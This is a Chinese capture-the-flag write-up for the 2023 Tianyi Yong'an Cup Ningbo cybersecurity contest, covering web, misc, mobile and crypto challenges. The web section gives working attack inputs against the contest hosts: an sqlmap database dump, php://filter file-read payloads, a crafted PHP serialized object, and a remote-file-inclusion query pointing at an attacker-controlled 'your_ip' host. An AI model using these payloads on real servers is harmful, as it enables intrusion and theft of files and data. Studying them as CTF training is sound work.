天一永安杯宁波市网络安全大赛 2023 Writeup

因为线下不报差旅，简单划划水(绝对不是因为打不进线下！😫)

Web

Query

Query suitable data and get your flag.

POST http://37a6852ac4faf290.node.nsctf.cn/login.php HTTP/1.1
Host: 37a6852ac4faf290.node.nsctf.cn
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://37a6852ac4faf290.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://37a6852ac4faf290.node.nsctf.cn/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lvsj65t588pem3sqkj1m24md6
Connection: close

username=1&password=*

直接使用 sqlmap 一把梭即可

python .\sqlmap.py -r post.txt -D 'ctf' -T 'f111' --dump

Deserialization

Construct your object

访问环境查看源代码发现代码片段，要求传递 $read 和 $input，其中 $read 不能包含 fl4g

<!--
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
include($read);
$input = unserialize($input);
$input2 = clone $input;
$input2->position = "route.php";
}
else{
die("NONONO!");
}
-->


NONONO!

根据已知逻辑，直接构造，首先使用伪协议先读取 route.php

read=php://filter/convert.base64-encode/resource=route.php&input=123

得到文件源码

<h1>Here can you find the position of the flag!</h1>

<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>

文件中又提到了 h1nt.php 接着读取

<?php
class test
{
    public $position;
    public function __clone(){  
        echo file_get_contents($this->position); 
        return $this->position;
    }
}  
?>  

逻辑很简单直接根据逻辑构造代码

<?php
class test
{
    public $position;
}  

$f = new test();
$f->position = 'f14g.php';
var_dump(serialize($f));
// O:4:"test":1:{s:8:"position";s:8:"f14g.php";}

因为我们需要触发反序列化，所以 read 需要读取 h1nt.php ，最终传递的参数为

read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:8:"f14g.php";}

CodeCheck

Check this code!

查看网页源代码得到部分代码片段

<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->
NONONO

逻辑很简单，要求 a 读取的内容等于 flag ，然后 b 和 c 内容不相同，直接远程文件包含＋伪协议

http://e644ab7e50751e44.node.nsctf.cn/
?a=http://your_ip/1.txt
&b=http://your_ip/1.txt
&c=flag
&d=php://filter/convert.base64-encode/resource=index.php

<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
<?php  
$flag = "flag{flag{a3722bcf95f64d05aab15a41a000fdfb}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    var_dump($_GET['c']);
    var_dump(file_get_contents($_GET['b']));
    die("yes");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}
?>

Misc

zip

Simple Compress

打开附件，文件备注了给了提示

The art of 0 and 1, and it will remain shorter than 9.

直接使用脚本列出所有可能，爆破得到密码 01001101

import itertools

digits = ['0', '1']
combinations = [''.join(combination) for combination in itertools.product(digits, repeat=9)]

with open('pass.txt', 'w') as f:
    for combination in combinations:
        f.write(combination + '\n')

SimpleDocument

More than image.

分离出一个 PDF 直接全选复制得到 flag（默认flag设置为了白色字体，所以看不到

BeautifulImage

Cool Mountain

lsb隐写，0通道存在一段base64

ZmxhZ3syNGVkZDc2ZTQ2YzIyYzY1Y2M1YmRkZDNjNmU0ZjZmM30=

Mobile

peacock

peacock

jadx 看半天没思路，直接尝试反编译 so 文件，发现是 base64 变表，直接解密即可

Crypto

secret

好神奇的密文！

import gmpy2
import libnum

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28

n = p * q
phi = (p - 1) * (q - 1)

t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)
print(mt1)
s, m = gmpy2.iroot(mt1, t)
print(s)
print(libnum.n2s(int(s)))

Morse的笔记本

你知道吗。今天我竟然在街上捡到了100元钞票，我当时简直惊呆了，太幸运了。于是我赶紧把钞票捡起来！心里面十分高兴。走了一段路之后，我看见了一个老奶奶在街角卖菜！我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去！把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐！因为我知道。这个世界因为有我们每一个人的善良而变得更美好，今天天气真的很好，我和小丽！小明越好一起去公园玩，在公园里，我们看见了一只可爱的小松鼠，它在树枝上蹦来蹦去！十分活泼可爱。我们还看见了一些漂亮的花朵，它们在微风中轻轻摇曳。像在跳舞一样！我们一边走一边欣赏，一边笑一边玩。真是度过了一个美好的下午。回家的路上！我感到心情特别愉悦。因为我知道。只要心怀善意！天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐！人生路上，有时候你会遇到阻碍。但只要你努力地挑战，不放弃。就能突破困境！实现自己的梦想，所以，不管你遇到什么样的挑战，都不要气馁！坚持下去，你一定会收获成功的喜悦。因为！只有那些坚定自己方向的人，才能走得更远，更自信。当我们遭遇挫折和失败的时候！不要被打倒。要用心去学习，从失败中汲取经验教训。然后重新站起来！更加坚定地追求自己的目标。成功并不是一蹴而就的，需要我们付出长久的努力和坚持！但只要我们一直前进，终究会到达成功的彼岸！所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。

mesr{997a9k414dx8m4061u74v15m1y32201k}

又是脑洞题目，观察发现只存在 ,.! 这三个符号，直接结合题目名转成摩斯电码

.--. .- ... ... .-- --- .-. -.. .. ... -.-. --- -. --. .-. .- - ...
// PASSWORDISCONGRATS

维吉尼亚密码解密之后凯撒密码解密得到 flag

rsa

用了什么数学知识嘞

import gmpy2

n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439

R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
f = 2 * a * x + 1
f_monic = f.monic()

ans = f_monic.small_roots(X=2 ** 60, beta=0.4, epsilon=0.05)
g = ans[0]

d = gmpy2.invert(gmpy2.mpz(65537), gmpy2.mpz((a - 1) * (g - 1)))
m = gmpy2.powmod(gmpy2.mpz(c), d, gmpy2.mpz(a * g))
plaintext = bytes.fromhex(hex(int(m))[2:])
plaintext